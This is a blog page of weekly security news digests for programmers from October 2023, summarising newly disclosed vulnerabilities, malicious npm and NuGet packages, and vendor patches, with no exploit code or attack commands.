Rose debug info
---------------

how human behavior affects security

Later Ctrl + ↑

Programmer’s Digest #53

10/11/2023-10/18/2023 New Admin Takeover Vulnerability, Critical Vulnerabilities Uncovered in Open Source CasaOS Cloud Software, Malicious NuGet Package And More.

1. New Admin Takeover Vulnerability Exposed in Synology’s DiskStation Manager

A medium-severity flaw has been discovered in Synology’s DiskStation Manager (DSM) that could be exploited to decipher an administrator’s password and remotely hijack the account. The flaw, assigned the identifier CVE-2023-2729, is rated 5.9 for severity on the CVSS scoring scale. The problem is rooted in the fact that the software uses a weak random number generator that relies on the JavaScript Math.random() method to programmatically construct the admin password for the network-attached storage (NAS) device. Referred to as insecure randomness, it arises when a function that can produce predictable values, or doesn’t have enough entropy, is used as a source of randomness in a security context, enabling an attacker to crack the encryption and defeat the integrity of sensitive information and systems. Successful exploitation of such flaws, therefore, could allow the threat actor to predict the generated password and gain access to otherwise restricted functionality.

2. Critical Vulnerabilities Uncovered in Open Source CasaOS Cloud Software

Two critical security flaws discovered in the open-source CasaOS personal cloud software could be successfully exploited by attackers to achieve arbitrary code execution and take over susceptible systems. A brief description of the two flaws is as follows –

  • CVE-2023-37265 – Incorrect identification of the source IP address, allowing unauthenticated attackers to execute arbitrary commands as root on CasaOS instances
  • CVE-2023-37265 – Unauthenticated attackers can craft arbitrary JSON Web Tokens (JWTs) and access features that require authentication and execute arbitrary commands as root on CasaOS instances.

A consequence of successful exploitation of the aforementioned flaws could allow attackers to get around authentication restrictions and gain administrative privileges on vulnerable CasaOS instances.

3. Experts Warn of Severe Flaws Affecting Milesight Routers and Titan SFTP Servers

A severe flaw in Milesight industrial cellular routers, tracked as CVE-2023-43261 with a CVSS score of 7.5, has been discovered and may have been exploited in real-world attacks. This vulnerability, affecting several router models, allows unauthorized access to sensitive information and could lead to the configuration of VPN servers and firewall protection removal. Evidence suggests that the flaw has been used on a small scale in the wild, with the attacker successfully authenticating on some systems using credentials extracted from httpd.log. Around 5% of internet-exposed Milesight routers are vulnerable to this issue, and the advice is to assume all credentials have been compromised and generate new ones while ensuring no interfaces are accessible from the internet to mitigate the risk.

4. Malicious NuGet Package Targeting .NET Developers with SeroXen RAT

 A malicious NuGet package, mimicking a legitimate one, has been discovered delivering the SeroXen RAT. While the genuine package had nearly 79,000 downloads, the malicious version artificially inflated its download count to over 100,000. The threat actor published six other packages, with four posing as crypto service libraries for Kraken, KuCoin, Solana, and Monero but actually deploying SeroXen RAT. The attack occurs during installation through a PowerShell script that exploits deprecated behavior, allowing arbitrary commands. SeroXen RAT, available for $60, is a fileless RAT combining the functions of Quasar RAT, r77 rootkit, and NirCmd. The discovery highlights the exploitation of open-source ecosystems by attackers.

5. Microsoft Releases October 2023 Patches for 103 Flaws, Including 2 Active Exploits

In its October 2023 Patch Tuesday updates, Microsoft addressed 103 software vulnerabilities, including 13 Critical and 90 Important flaws, along with 18 in its Chromium-based Edge browser since September. Two zero-day vulnerabilities are of particular concern:

  • CVE-2023-36563 (CVSS score: 6.5) – An information disclosure flaw in Microsoft WordPad, potentially leaking NTLM hashes.
  • CVE-2023-41763 (CVSS score: 5.3) – A privilege escalation vulnerability in Skype for Business that could expose sensitive data, such as IP addresses and port numbers, granting access to internal networks.

Additionally, multiple vulnerabilities affecting Microsoft Message Queuing and Layer 2 Tunneling Protocol were fixed, which could lead to remote code execution and denial-of-service. A privilege escalation bug in Windows IIS Server (CVE-2023-36434) was addressed. An update for CVE-2023-44487 was released to mitigate HTTP/2 Rapid Reset attacks. Microsoft also deprecated Visual Basic Script, which has been exploited for malware distribution, and it will be removed from future Windows releases.

 

6. ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

Threat actors behind ShellBot are infiltrating poorly managed Linux SSH servers using hexadecimal IP addresses. They have altered their method of deploying ShellBot from a regular IP address to a hexadecimal value, aiming to avoid URL-based detection. ShellBot, also known as PerlBot, exploits servers with weak SSH credentials through dictionary attacks, serving as a conduit for DDoS attacks and cryptocurrency miners. The malware communicates with a command-and-control (C2) server via the IRC protocol. This change indicates ShellBot’s continued use for Linux system attacks. To counter this, users are advised to employ strong, regularly changed passwords to resist brute-force and dictionary attacks. Additionally, attackers are using abnormal certificates with exceptionally long strings in an attempt to distribute information-stealing malware. These malicious pages, often linked to illegal software, pose a threat to a wide range of users.

2023   digest   programmers'

Programmer’s Digest #52

10/04/2023-10/11/2023 Critical Atlassian Confluence Vulnerability, Linux Systems Vulnerable to RCE Attacks, Security Patch for Two New Flaws in Curl Library And More.

1. Microsoft Warns of Nation-State Hackers Exploiting Critical Atlassian Confluence Vulnerability

Microsoft has tied the recent critical flaw in Atlassian Confluence Data Center and Server, known as CVE-2023-22515, to a nation-state actor called Storm-0062 (aka DarkShadow or Oro0lxy). This vulnerability, a privilege escalation issue, enables the creation of unauthorized Confluence administrator accounts and has been exploited in the wild since September 14, 2023. Rated 10.0 on the CVSS severity scale, it affects various Confluence versions. Although the full extent of the attacks remains uncertain, Atlassian learned of the issue from a few customers, indicating that it was a zero-day exploit. Notably, Oro0lxy is a digital alias used by Li Xiaoyu, a Chinese hacker accused by the U.S. Department of Justice in July 2020 of infiltrating numerous companies, including Moderna, a COVID-19 vaccine developer, on behalf of the Ministry of State Security (MSS) in Guangdong.

2.  HTTP/2 Rapid Reset Zero-Day Vulnerability Exploited to Launch Record DDoS Attacks

In August 2023, Amazon Web Services (AWS), Cloudflare, and Google disclosed mitigating unprecedented DDoS attacks that exploited the HTTP/2 Rapid Reset technique, tracked as CVE-2023-44487 with a CVSS score of 7.5. These layer 7 attacks flooded Google’s cloud infrastructure with up to 398 million requests per second, while AWS and Cloudflare experienced 155 million and 201 million RPS, respectively. HTTP/2 Rapid Reset exploits a zero-day flaw in HTTP/2, using the protocol’s multiplexing feature to send and cancel requests in quick succession, overwhelming servers. Notably, even a relatively small botnet of around 20,000 machines can execute such attacks. These DDoS attacks have become a significant threat, with HTTP/2 widely used across 35.6% of websites and 77% of web requests. Google observed multiple variants of Rapid Reset attacks, some more efficient than standard HTTP/2 DDoS attacks, making it a critical tool for threat actors.

3.  libcue Library Flaw Opens GNOME Linux Systems Vulnerable to RCE Attacks

A security flaw in the libcue library has been revealed, affecting GNOME Linux systems and posing a risk of remote code execution (RCE). Tracked as CVE-2023-43641 with a CVSS score of 8.8, this issue results from memory corruption in libcue versions 2.2.1 and earlier. The flaw resides in an out-of-bounds array access in the track_set_index function, enabling code execution when a victim downloads a .cue file from a malicious link. This vulnerability in libcue can be exploited with just one click, making it particularly concerning. Users are urged to install the latest updates, as further technical details are being withheld for security reasons. This disclosure follows a recent high-severity vulnerability in Google Chrome’s V8 JavaScript engine that also enabled RCE through visiting malicious sites, emphasizing the importance of prompt patching.

4. Security Patch for Two New Flaws in Curl Library Arriving on October 11

 Curl library maintainers have warned of two upcoming security vulnerabilities to be addressed in the October 11, 2023, update. These are CVE-2023-38545 (high-severity) and CVE-2023-38546 (low-severity). Detailed information is withheld to prevent pre-release problem identification, but it affects versions over the past several years. Curl, a widely-used command-line data transfer tool, supports various protocols. CVE-2023-38545 impacts both libcurl and curl, while CVE-2023-38546 affects only libcurl. The vulnerabilities will be fixed in curl version 8.4.0. Users are advised to scan their systems using curl and libcurl, anticipating potentially vulnerable versions when details are disclosed in the release on October 11. 

5. GitHub’s Secret Scanning Feature Now Covers AWS, Microsoft, Google, and Slack

GitHub is enhancing its secret scanning feature to validate tokens from services like AWS, Microsoft, Google, and Slack, alerting users to exposed tokens. This improvement builds on the validity checks introduced earlier this year for GitHub tokens and is planned to expand to more tokens in the future. To enable this feature, enterprise or organization owners and repository administrators can go to Settings > Code security and analysis > Secret scanning and select “Automatically verify if a secret is valid by sending it to the relevant partner.” 

6. CISA Warns of Active Exploitation of JetBrains and Windows Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog. Two new additions include:

  • CVE-2023-42793 (CVSS 9.8) – JetBrains TeamCity Authentication Bypass Vulnerability: This flaw allows remote code execution on TeamCity Server, with 74 unique IP addresses attempting exploitation.
  • CVE-2023-28229 (CVSS 7.0) – Microsoft Windows CNG Key Isolation Service Privilege Escalation Vulnerability: This high-severity issue enables specific SYSTEM privileges. While in-the-wild exploitation hasn’t been reported, a proof-of-concept (PoC) was shared.

Five vulnerabilities related to Owl Labs Meeting Owl have been removed due to insufficient evidence. Federal Civilian Executive Branch agencies must apply vendor-provided patches for the two actively exploited flaws by October 25, 2023, for network security. Microsoft has rated CVE-2023-28229 as “Exploitation Less Likely” and addressed it in April 2023 Patch Tuesday updates.

7. Cisco Releases Urgent Patch to Fix Critical Flaw in Emergency Responder Systems

 Cisco has released updates to address a critical security flaw in Emergency Responder (CVE-2023-20101, CVSS 9.8). This vulnerability allows unauthenticated, remote attackers to log into affected systems using hard-coded credentials. The flaw results from static user credentials for the root account, typically used during development. Exploiting this flaw could grant attackers access to the system and the ability to execute arbitrary commands as the root user. The issue affects Cisco Emergency Responder Release 12.5(1)SU4 and has been resolved in version 12.5(1)SU5. Cisco detected this problem during internal security testing and is not aware of any in-the-wild exploitation. Customers are advised to update to the latest version to mitigate potential threats.

2023   digest   programmers'

Programmer’s Digest #51

09/27/2023-10/04/2023 New Linux Flaw, PyTorch Models Vulnerable, Urgent Hotfixes for Multiple Security Flaws in WS_FTP Server And More.

1. Looney Tunables: New Linux Flaw Enables Privilege Escalation on Major Distributions

A new Linux security vulnerability, named Looney Tunables (CVE-2023-4911, CVSS score: 7.8), has been found in the GNU C library’s dynamic loader. This vulnerability, discovered by Qualys, involves a buffer overflow when processing the GLIBC_TUNABLES environment variable. It was introduced in an April 2021 code commit. This library is critical to Linux systems, responsible for preparing and running programs.
Major Linux distributions like Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13 are affected. An attacker with local access could exploit this flaw to execute code with elevated privileges. Red Hat has issued a mitigation that terminates setuid programs invoked with GLIBC_TUNABLES in the environment. Looney Tunables joins a growing list of privilege escalation vulnerabilities in Linux in recent years.

2. Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch

Researchers have uncovered critical security flaws in the PyTorch model-serving tool, TorchServe, which they’ve named ShellTorch. These vulnerabilities could potentially lead to remote code execution. Israel-based security firm Oligo made the discovery and warns that these flaws pose a serious risk to numerous services, including some major companies, as they allow unauthorized access and the insertion of malicious AI models. The vulnerabilities have been addressed in version 0.8.2. Exploiting these flaws could allow an attacker to upload a malicious model and execute arbitrary code without requiring authentication on a default TorchServe server. AWS has issued an advisory urging users to update to TorchServe version 0.8.2 if they are using specific PyTorch inference Deep Learning Containers.

3. Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers

Almost three dozen counterfeit npm packages have been discovered by Fortinet FortiGuard Labs, posing a threat to developer systems. One group of packages, including @expue/webpack and @virtualsearchtable/virtualsearchtable, contains an obfuscated JavaScript file capable of collecting valuable data like Kubernetes configurations, SSH keys, and system metadata. Another set of modules, binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate, unauthorizedly extracts source code and configuration files. Some packages use Discord webhooks for data exfiltration, while others automatically download and execute potentially malicious files from URLs. Notably, @cima/prism-utils disables TLS certificate validation, potentially exposing connections to adversary-in-the-middle attacks. Fortinet categorized these modules into nine groups based on code similarities and functions, with many using install scripts for data harvesting.

4. Arm Issues Patch for Mali GPU Kernel Driver Vulnerability Amidst Ongoing Exploitation

Arm has released security patches to address a security flaw (CVE-2023-4211) in the Mali GPU Kernel Driver that’s being actively exploited. This vulnerability impacts various driver versions, allowing a local non-privileged user to gain access to already freed memory through improper GPU memory processing operations. Google has also identified targeted exploitation of this flaw. Arm has fixed the issue in specific driver versions.

In addition, Arm resolved two other vulnerabilities in the Mali GPU Kernel Driver:

  • CVE-2023-33200: Allows a local non-privileged user to exploit a software race condition, potentially accessing already freed memory.
  • CVE-2023-34970: Permits a local non-privileged user to make improper GPU processing operations, potentially accessing memory outside buffer bounds or exploiting a software race condition, leading to access to already freed memory.

5. Progress Software Releases Urgent Hotfixes for Multiple Security Flaws in WS_FTP Server

Progress Software has issued critical security hotfixes for eight vulnerabilities in WS_FTP Server Ad hoc Transfer Module and the WS_FTP Server manager interface. One of the flaws, CVE-2023-40044, with a CVSS score of 10.0, is particularly severe, allowing pre-authenticated attackers to execute remote commands. Other vulnerabilities include directory traversal (CVE-2023-42657), XSS (CVE-2023-40045 and CVE-2023-40047), SQL injection (CVE-2023-40046), CSRF (CVE-2023-40048), and authentication bypass (CVE-2023-40049). Rapid7 has observed instances of exploitation in the wild, emphasizing the importance of promptly applying the patches. Progress Software has been dealing with the aftermath of a major hack targeting its MOVEit Transfer platform since May 2023, affecting numerous organizations and individuals.

6. How to Impersonate a Service Account Using Bigquery Client Library

A service account in Google Cloud is a specialized account designed for applications and compute workloads, rather than human users. It’s identified by a unique email address. To make an application act like a service account, you connect it to the resource where it runs, like a Compute Engine instance. This allows the application to act on behalf of the service account. You can then grant the service account specific permissions (IAM roles) to access Google Cloud resources.
For scenarios requiring stricter permissions control, especially in multi-tenant deployments, Google Cloud offers Service Account impersonation. This feature allows for isolation of resource access controls for each organization or customer.
Impersonation enables authenticated principals (e. g., users or other service accounts) to assume the permissions of a service account. It’s particularly useful for short-lived token flows to avoid exposing service account credentials.
To implement Service Account impersonation with the BigQuery client library, you’ll need to use packages like google-cloud-bigquery and google-auth. More details and code samples can be found in Google Cloud’s documentation on Service Account impersonation.

7. Cisco Warns of Vulnerability in IOS and IOS XE Software After Exploitation Attempts

Cisco has issued a warning about a medium-severity vulnerability (CVE-2023-20109) in its IOS Software and IOS XE Software. The flaw, with a CVSS score of 6.6, affects versions of the software with the GDOI or G-IKEv2 protocol enabled. An authenticated remote attacker with administrative control of a group member or key server could execute arbitrary code or crash the device. The issue stems from insufficient validation of attributes in the GDOI and G-IKEv2 protocols of the GET VPN feature. It could be exploited by compromising a key server or altering the configuration of a group member to point to an attacker-controlled key server. Cisco also disclosed five flaws in Catalyst SD-WAN Manager (versions 20.3 to 20.12) that could lead to unauthorized access, configuration rollback, information disclosure, authorization bypass, and denial of service. Customers are advised to update to a fixed software release to address these vulnerabilities.

2023   digest   programmers'
Earlier Ctrl + ↓